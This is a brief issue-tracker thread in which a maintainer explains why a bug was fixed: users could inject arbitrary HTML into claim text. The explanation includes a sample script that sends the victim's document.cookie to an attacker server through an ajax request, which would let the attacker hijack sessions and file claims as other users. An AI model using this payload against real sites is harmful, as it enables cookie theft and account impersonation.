autogestion
commented
9 years ago So, there was a way for user to insert somewhere hosted picture in claim text? Maybe it's not a bug, but feature?)
Closed Vegasq closed 9 years ago
autogestion
commented
9 years ago So, there was a way for user to insert somewhere hosted picture in claim text? Maybe it's not a bug, but feature?)
Vegasq
commented
9 years ago Nope. There was a problem that user can insert any html code on page, and f.e. using JS injection, bad guy had an option to stole cookie and create claim from other user.
Like:
<script>
$.ajax({'url': 'my/server?cookie=' + document.cookie})
</script>
Way to prevent stupid bug :laughing: